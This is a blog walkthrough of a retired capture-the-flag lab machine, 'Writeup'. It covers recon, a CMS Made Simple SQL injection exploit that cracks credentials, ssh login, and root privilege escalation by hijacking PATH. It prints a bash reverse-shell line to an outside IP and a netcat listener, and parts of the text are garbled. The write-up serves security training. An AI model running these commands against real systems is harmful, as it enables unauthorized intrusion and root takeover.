About Us Contact Us
Home About Services Solutions Industries Knowledge Blog Contact
Hit enter to search

Blogs

CyberSecurity BFSI

Learn to work with Writeup Box

Introduction

Switch to a new blog. Today we're going to go through the Writeup machine's walkthrough based on the recently retired Linux machine. Because it was classified into the easy category, it was a bit tricky. It was quite easy to get the user flag, but during the privilege escalation phase it got a bit stuck. So without further ado let's begin…
infopercept blog

Recon

We're going to start our reconciliation with a Nmap scan.
nmap -sC -sV 10.10.10.138
infopercept blog

As we can see port 80 is open, let's check that in our browser first.
infopercept blog

As you can see from the above text, a script for DoS security has been introduced so we're not going to be blurring here for folders and files.
Returning to our Nmap scan, we can clearly see an unauthorized entry called /writeup/ in the robots.txt file. Let's go to that article.
infopercept blog

Let's try to see if we can get any clue from that source code.
infopercept blog

Ok, so it looks like the page is built using CMS made simple framework.


Exploitation

Going back to our terminal, let's use searchsploit to search for any available exploits: searchsploit “CMS made simple”
infopercept blog
Looks like an exploit for SQL injection, let's try to use it because it affects all versions less than 2.2.10. More details about this could be found here.
Let's look at the code for once before we go further.
infopercept blog
It's a time-based SQL injection as per the definition and we can also define a password cracking wordlist so let's run this code along with our favorite wordlist password: rockyou.txt
python -u http://10.10.10.138/writeup/ –crack -w
infopercept blog
infopercept blog
So we've got the username and password successfully.
username: jkr
password: raykayjay9
Now if you recall that we also had ssh port(22) available. Let's start using the credentials above. Type the ssh command below to log in to the server.
ssh jkr@10.10.10.148
Let's type the password as above and we should get our user flag in the current directory after logging in.
infopercept blog

Privilege Escalation

Let's look for our root flag now. We can start by continuously monitoring the system with an incredible tool / script called pspy.


We can migrate it either by scp or simply by using python / apache to host it on our web server. Let's run pspy right now ...
infopercept blog

Although there is a lot of information above, let's just look at the PATH Function there and command run-parts running as UID 0. For those who don't know the PATH function is just an environment variable in Linux and other Unix-like operating systems that tells the shell which directories to scan to executable files in response to a user's commands.

Simply put, if we want to run an executable file, we go to the directory where it is present and run it by typing it.“./filename” However if we just want to run the file from any directory by typing in “filename” Without "./," the directory path must be added to the PATH variable. More details can be found here
Let's test the run-parts route by type in “which run-parts” and also check the variable path by typing in “echo $PATH“.
And this is what we have in the vector PATH:
infopercept blog
Now the next move is to search all the directories in the box that can be posted. Type in “find / -type d -writable 2>/dev/null”
infopercept blog
Looks like the /usr / local / bin/ directory can be written and is also included in the PATH variable so we can add our own run-parts file to that directory that would contain our reverse shell and send us our reverse shell when it is executed.
Let's put our reverse shell in run-parts first and position it in /usr / local / bin/ by typing in:
echo “/bin/bash -c bash -i >& /dev/tcp/10.10.15.171/1234 0>&1” > /usr/local/bin/run-parts
You will receive a list of reverse shells pentestmonkey.
Next, let's allow the file to be executed:
chmod 777 /usr/local/bin/run-parts
Now let's go to our other terminal and open our port for netcat listening:
nc -lnvp 1234
infopercept blog
All we have to do now is wait for our file to run automatically after a few minutes depending on the box's traffic. If the traffic is less for VIP users in particular, you can simply open another terminal and log in to start another ssh session.
And we got our reverse shell as root after a few minutes.
infopercept blog
Let's transfer to the directory of root and see the file of root.txt.
infopercept blog

That's how we got our root flag and successfully completed the challenge.
So for now, that's it. See you next time.